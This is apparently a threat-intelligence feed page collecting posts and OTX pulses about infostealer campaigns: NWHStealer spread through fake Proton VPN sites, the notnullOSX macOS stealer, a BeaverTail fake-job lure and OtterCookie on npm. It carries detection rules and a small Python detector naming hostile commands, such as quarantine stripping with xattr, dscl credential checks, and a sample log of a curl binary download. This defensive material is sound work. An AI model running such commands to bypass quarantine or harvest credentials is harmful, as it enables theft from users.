Proton VPN: fake app steals all the data from the computer
Researchers at Malwarebytes have identified a website distributing a fake version of Proton VPN. Unsuspecting users are deceived by a design similar to the original and download a ZIP archive that contains an infostealer. Age verification is due to be introduced in many countries (including in Europe), so cybercriminals will exploit the opportunity to their advantage.

#protonvpn #infostealer #proton

https://www.punto-informatico.it/proton-vpn-falsa-app-ruba-dati-computer/

Proton VPN: fake app steals all the data from the computer

A site resembling the original distributes Proton VPN for Windows, but it is actually malware that steals data from browsers and cryptocurrency wallets.

Punto Informatico

NWHStealer infostealer malware on fake ProtonVPN download pages

More:
https://maniabel.work/archiv/1457

#InfoStealer #NWHStealer #YoutubeUni #Malware #ProtonVPN #infosec #up2date

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere | Malwarebytes

Pulse ID: 69e24b399265b525ec5bdd33
Pulse Link: https://otx.alienvault.com/pulse/69e24b399265b525ec5bdd33
Pulse Author: CyberHunter_NL
Created: 2026-04-17 15:01:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #MalWareBytes #Malware #OTX #OpenThreatExchange #VPN #Windows #bot #CyberHunter_NL

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

@habr25 [Translation] How a “dream job invitation” turns into an attack

It all starts with a notification that feels familiar and exciting for any developer: “You’ve been shortlisted for an AI developer position.” The company looks impressive — DLMind, an “AI innovation lab.” The recruiter appears legitimate — Tim Morenc, CEDS, with a polished LinkedIn profile, professional communication style, and mutual connections.

But behind this friendly outreach is BeaverTail — a malicious operation designed to steal your code, credentials, and developer assets.

The attack is part of a broader pattern associated with North Korean cyber operations, including groups such as Lazarus Group.

How the attack works

The victim is approached via LinkedIn or similar platforms

A convincing fake company and recruiter profile is used

A “technical assignment” or test task is provided

The task contains malicious code or a compromised dependency

Once executed, it extracts sensitive data such as:

GitHub / Git credentials

SSH keys

API tokens

browser session data

Why it works

The campaign relies on social engineering rather than technical exploitation:

trust in recruitment processes

desire for career opportunities

familiarity of developer workflows (GitHub, npm, Python, etc.)

Key takeaway

Any unsolicited “test assignment” should be treated as potentially hostile code. Execution environments must be isolated, and credentials should never be exposed in evaluation setups.

---

#hashtags
#cybersecurity #infosec #malware #socialengineering #phishing #infostealer #supplychainattack #github #developers #techsecurity #beavertail #lazarusgroup

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

Pulse ID: 69e06a7c0d69fc2a60920fdd
Pulse Link: https://otx.alienvault.com/pulse/69e06a7c0d69fc2a60920fdd
Pulse Author: Tr1sa111
Created: 2026-04-16 04:50:04

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #OTX #OpenThreatExchange #VPN #Windows #bot #Tr1sa111


NotNullOSX macOS stealer TTPs which seem unique from other commodity macOS infostealers:

Block or alert on outbound connections to mactest-6b2ab-default-rtdb[.]firebaseio.com.
Flag persistent text/event-stream (SSE) connections from macOS endpoints.
Alert on Mach-O binaries downloaded from cdn.filestackcontent[.]com.
Monitor for LaunchAgents with plaintext credentials in EnvironmentVariables.
Flag dscl . -authonly calls from non-system processes.
Alert on xattr -rd com.apple.quarantine invoked from a browser or document context.
Review any Full Disk Access grants to unrecognized applications.
Check /tmp for staged, short-lived Mach-O binaries, especially with names matching the module naming convention (*Grab, ReplaceApp).
Alert on curl fetching a binary from an unknown or unfamiliar domain followed immediately by xattr -d com.apple.quarantine.
https://moonlock.com/notorious-hacker-returns-notnullosx-stealer

#threatintel #notnullOSX #infostealer #macos

Notorious hacker returns with a new macOS stealer

The malware targets $10K+ crypto wallets.

Moonlock

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

Multiple campaigns are distributing NWHStealer through diverse platforms including fake VPN downloads, hardware utilities, and gaming modifications. The infostealer collects browser data, saved passwords, and cryptocurrency wallet information. Distribution occurs via fake websites impersonating legitimate services like Proton VPN, code hosting platforms such as GitHub and GitLab, file hosting services including MediaFire and SourceForge, and links from YouTube videos. Two primary infection methods are analyzed: one using a free web hosting provider distributing malicious ZIP files with self-injection loaders, and another employing fake websites with DLL hijacking techniques that inject into the RegAsm process. The stealer targets over 25 cryptocurrency wallets and multiple browsers, exfiltrating data to command-and-control servers using AES-CBC encryption and maintaining persistence through scheduled tasks and UAC bypass techniques.

Pulse ID: 69dfb91808e1258915184d6e
Pulse Link: https://otx.alienvault.com/pulse/69dfb91808e1258915184d6e
Pulse Author: AlienVault
Created: 2026-04-15 16:13:12

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #ELF #Encryption #GitHub #InfoSec #InfoStealer #OTX #OpenThreatExchange #Password #Passwords #RAT #RCE #VPN #Windows #Word #YouTube #ZIP #bot #cryptocurrency #AlienVault


A new Mac stealer targeting $10K+ crypto wallets

A sophisticated macOS stealer called notnullOSX emerged in March 2026, developed by threat actor alh1mik (formerly 0xFFF) who returned after a 2023 exit from underground forums. This Go-written modular stealer exclusively targets macOS users with cryptocurrency holdings exceeding $10,000. Distribution occurs through ClickFix social engineering and malicious DMG files disguised as legitimate applications like WallSpace. The malware employs a modular architecture with specialized components to exfiltrate iMessage history, Apple Notes, browser credentials, Safari cookies, crypto wallet files, SSH keys, and cloud provider credentials. By social-engineering victims into granting Full Disk Access, notnullOSX bypasses macOS TCC protections without triggering permission dialogs. The stealer maintains persistent WebSocket connections to Firebase infrastructure, functioning as both an infostealer and backdoor with remote module update capabilities.

Pulse ID: 69dfa7d6ed3496f811a87d22
Pulse Link: https://otx.alienvault.com/pulse/69dfa7d6ed3496f811a87d22
Pulse Author: AlienVault
Created: 2026-04-15 14:59:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Cloud #Cookies #CyberSecurity #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #RAT #SSH #Safari #SocialEngineering #bot #cryptocurrency #AlienVault

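Two of the notnullOSX detection ideas above (plaintext credentials in a LaunchAgent's EnvironmentVariables, and a curl download followed immediately by stripping com.apple.quarantine) turned into runnable checks over constructed sample data. This is an added example, not code from Moonlock or the pulse; the plist label, the log format "timestamp|pid|command", and the download domain are made up for illustration.

```python
import plistlib
import re
from datetime import datetime

# Constructed LaunchAgent plist modelled on the "plaintext credentials in
# EnvironmentVariables" TTP; label, path and values are invented for this example.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/tmp/ReplaceApp</string></array>
  <key>EnvironmentVariables</key><dict>
    <key>USER_PASSWORD</key><string>hunter2</string>
    <key>PATH</key><string>/usr/bin:/bin</string>
  </dict>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

CRED_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|cred", re.I)

def credential_env_vars(plist_bytes):
    """Return EnvironmentVariables keys whose name looks like a credential and whose value is non-empty."""
    env = plistlib.loads(plist_bytes).get("EnvironmentVariables", {})
    return sorted(k for k, v in env.items() if CRED_KEY.search(k) and isinstance(v, str) and v)

# Constructed process-start log, one event per line: "ISO timestamp|pid|command line".
# The domain is a placeholder (.invalid TLD), not an indicator from the article.
EVENTS = """2026-04-15T10:00:01|501|curl -fsSL https://cdn.example.invalid/ReplaceApp -o /tmp/ReplaceApp
2026-04-15T10:00:03|502|xattr -d com.apple.quarantine /tmp/ReplaceApp
2026-04-15T10:05:00|503|curl -fsSL https://brew.sh/install.sh -o /tmp/install.sh
2026-04-15T10:30:00|504|xattr -d com.apple.quarantine /Users/dev/Downloads/notes.pdf""".splitlines()

CURL_DL = re.compile(r"^curl\b.*?-o\s+(\S+)")                 # curl ... -o <path>
XATTR_STRIP = re.compile(r"^xattr\s+-r?d\s+com\.apple\.quarantine\s+(\S+)")  # xattr -d / -rd

def curl_then_quarantine_strip(lines, window_s=60):
    """Return (path, seconds_between) for every curl download whose quarantine flag
    is stripped within window_s seconds; other xattr calls and downloads are ignored."""
    downloads, hits = {}, []
    for line in lines:
        ts, _pid, cmd = line.split("|", 2)
        t = datetime.fromisoformat(ts)
        if m := CURL_DL.match(cmd):
            downloads[m.group(1)] = t
        elif (m := XATTR_STRIP.match(cmd)) and m.group(1) in downloads:
            dt = (t - downloads[m.group(1)]).total_seconds()
            if 0 <= dt <= window_s:
                hits.append((m.group(1), dt))
    return hits

if __name__ == "__main__":
    print("credential env vars:", credential_env_vars(SUSPECT_PLIST))
    print("curl -> quarantine strip:", curl_then_quarantine_strip(EVENTS))
```

On a real endpoint the plist would come from ~/Library/LaunchAgents and the events from an EDR or ESF process feed; the matching logic stays the same.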

Tracking an OtterCookie Infostealer Campaign Across npm

Pulse ID: 69ddc21e3b9bc0b44e740eba
Pulse Link: https://otx.alienvault.com/pulse/69ddc21e3b9bc0b44e740eba
Pulse Author: Tr1sa111
Created: 2026-04-14 04:27:10

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #NPM #OTX #OpenThreatExchange #bot #Tr1sa111
